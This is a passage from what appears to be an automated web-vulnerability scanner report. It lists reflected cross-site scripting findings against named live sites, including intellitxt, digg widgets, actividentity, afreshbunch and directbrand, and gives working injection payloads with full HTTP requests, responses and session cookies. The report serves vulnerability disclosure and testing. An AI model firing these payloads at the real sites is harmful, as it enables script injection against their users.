Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: text/html
Content-Length: 205
Date: Tue, 26 Apr 2011 14:21:10 GMT
Age: 0
Connection: keep-alive

<html><body><script src="http://pixel.intellitxt.com/pixel.jsp?id=2773,2759,2761,2791&type=script&ipid=10143&sfid=07d361"><script>alert(1)</script>526ac49452b" language="javascript"></script></body></
...[SNIP]...

4.34. http://spamlaws.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5c8c'-alert(1)-'43cbe071eb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10143&b5c8c'-alert(1)-'43cbe071eb6=1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LAEAAAEviQskDAA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki9ubwA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:21:12 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:21:12 GMT
Age: 0
Connection: keep-alive
Content-Length: 11733

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
ogle,aol,ask,live,bing",
'ids.aol':"10",
'fields.aol':"query,as_q,q",
'fields.ask':"q",
'fields.google':"q,as_q"};
$iTXT.js.serverUrl='http://spamlaws.us.intellitxt.com';$iTXT.js.pageQuery='ipid=10143&b5c8c'-alert(1)-'43cbe071eb6=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

4.35. http://spamlaws.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2cbe2%3balert(1)//ce669c8cced was submitted in the jscallback parameter. This input was echoed as 2cbe2;alert(1)//ce669c8cced in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback02cbe2%3balert(1)//ce669c8cced HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:40 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:22:40 GMT
Age: 0
Connection: keep-alive
Content-Length: 18079

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback02cbe2;alert(1)//ce669c8cced({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

4.36. http://spamlaws.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://spamlaws.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7e30"-alert(1)-"30a0183f25f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/init?ts=1303827671318&pagecl=6516&fv=10&muid=&refurl=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html&ipid=10143&jscallback=$iTXT.js.callback0&e7e30"-alert(1)-"30a0183f25f=1 HTTP/1.1
Host: spamlaws.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.spamlaws.com/spam-blocker.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgAAAAAAAAAAAAEKCgc1; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 14:22:46 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 14:22:46 GMT
Age: 0
Connection: keep-alive
Content-Length: 18060

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
OSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","e7e30"-alert(1)-"30a0183f25f":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.spamlaws.com/spam-blocker.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.pa
...[SNIP]...

4.37. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 88f92<script>alert(1)</script>469cca08b69 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=http%3A//xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html88f92<script>alert(1)</script>469cca08b69 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 26 Apr 2011 11:34:34 GMT
Via: NS-CACHE: 100
Etag: "f826c2a942d9d8c66eb57c86894cab9044a8141e"
Content-Length: 212
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 26 Apr 2011 11:44:33 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://xss.cx/2011/04/26/dork/accountsnapcom/reflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html88f92<script>alert(1)</script>469cca08b69", "diggs": 0});

4.38. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 863f5(a)6ceac5198b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C863f5(a)6ceac5198b/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 138

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C863f5(a)6ceac5198b/script%3Ecf590911e53/securimage/securimage_play.swf

4.39. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62283<script>alert(1)</script>7bc530bad97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /62283<script>alert(1)</script>7bc530bad97/script%3Ecf590911e53/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 116

Bad file./var/www/html/62283<script>alert(1)</script>7bc530bad97/script%3Ecf590911e53/securimage/securimage_play.swf

4.40. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5721a(a)e0872078c2d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e535721a(a)e0872078c2d/securimage/securimage_play.swf

4.41. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload da714(a)a22d71e7157 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimageda714(a)a22d71e7157/securimage_play.swf?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimageda714(a)a22d71e7157/securimage_play.swf

4.42. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.actividentity.com
Path:   /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4c759(a)e999cc0505a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf4c759(a)e999cc0505a?audio=/inc/securimage/securimage_play.phpx&amp;bgColor1= HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303677833.2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 139

Bad file./var/www/html/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf4c759(a)e999cc0505a

4.43. http://www.afreshbunch.com/ [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 724aa"style%3d"x%3aexpr/**/ession(alert(1))"0d3fc4acadb was submitted in the email parameter. This input was echoed as 724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /?page=login&cmd=start_reg HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=register
Cache-Control: max-age=0
Origin: http://www.afreshbunch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.2.10.1303778640
Content-Length: 589

email=sa94115%40gmail.com724aa"style%3d"x%3aexpr/**/ession(alert(1))"0d3fc4acadb&password=123456&password1=123456&username=asdfgh&b_month=1&b_day=1&b_year=1996&recaptcha_challenge_field=03AHJ_VuvPoN7XCRMiDNl_e1-gKQxdcJE6t2XSOLpLWb79sCwjRxcelAxYlvgrbXoUo5he3r2H3-AeU5VL2w10Dnv0VVa8
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 29517
Content-Type: text/html
Expires: Tue, 26 Apr 2011 00:51:08 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:52:09 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<input name="email" size="30" value="sa94115@gmail.com724aa"style="x:expr/**/ession(alert(1))"0d3fc4acadb">
...[SNIP]...

4.44. http://www.afreshbunch.com/files/com/call.asp [instance_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the instance_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1b1"><script>alert(1)</script>2abb0614564 was submitted in the instance_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D7483b1b1"><script>alert(1)</script>2abb0614564&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fpage%3Dlogin%26cmd%3Dstart%5Freg&loadtime=0.28 HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login&cmd=start_reg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF; __utma=1.1309413586.1303778640.1303778640.1303778640.1; __utmb=1; __utmc=1; __utmz=1.1303778640.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.2.10.1303778640

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1487
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:47:21 GMT


<html>
<head>
<title></title>
<link rel="stylesheet" type="text/css" href="../../system/error.css" />
</head>
<body>
30
<script>
function checkcomment(objValue)
{

if(ev
...[SNIP]...
<input type="hidden" name="page" value="http://www.afreshbunch.com//files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D7483b1b1"><script>alert(1)</script>2abb0614564&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fpage%3Dlogin%26cmd%3Dstart%5Freg&loadtime=0.28">
...[SNIP]...

4.45. http://www.afreshbunch.com/files/com/call.asp [lastpage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.afreshbunch.com
Path:   /files/com/call.asp

Issue detail

The value of the lastpage request parameter is copied into the HTML document as plain text between tags. The payload 70f69<script>alert(1)</script>13cb3a90beb was submitted in the lastpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /files/com/call.asp?page=stats&instance_id=CB37911B-6349-45F9-8E60-626BA164D748&site_id=453756&muid=NOMEMBER&lastpage=%2FDefault%2Easp%3Fcachecommand%3Dbypass70f69<script>alert(1)</script>13cb3a90beb&loadtime=0.55 HTTP/1.1
Host: www.afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: site=referring%5Fsite=; ASPSESSIONIDSSTDDTRS=AEADHBADPKOMNGPLMGMBHKBF

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 277
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 00:47:22 GMT


//document.write("<textarea>/Default.asp?page=loginbf6df%2522%2520a%253db%25206e68fa8c6ae&cmd=approval&a=1</textarea>")
//document.write("<br><textarea>/Default.asp?cachecommand=bypass70f69<script>alert(1)</script>13cb3a90beb</textarea>
...[SNIP]...

4.46. http://www.directbrand.com/tracking202/static/landing.php [lpip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.directbrand.com
Path:   /tracking202/static/landing.php

Issue detail

The value of the lpip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d39c'%3balert(1)//86fb6401f85 was submitted in the lpip parameter. This input was echoed as 8d39c';alert(1)//86fb6401f85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tracking202/static/landing.php?lpip=923178d39c'%3balert(1)//86fb6401f85 HTTP/1.1
Host: www.directbrand.com
Proxy-Connection: keep-alive
Referer: http://www.cleanallspyware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 13:52:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
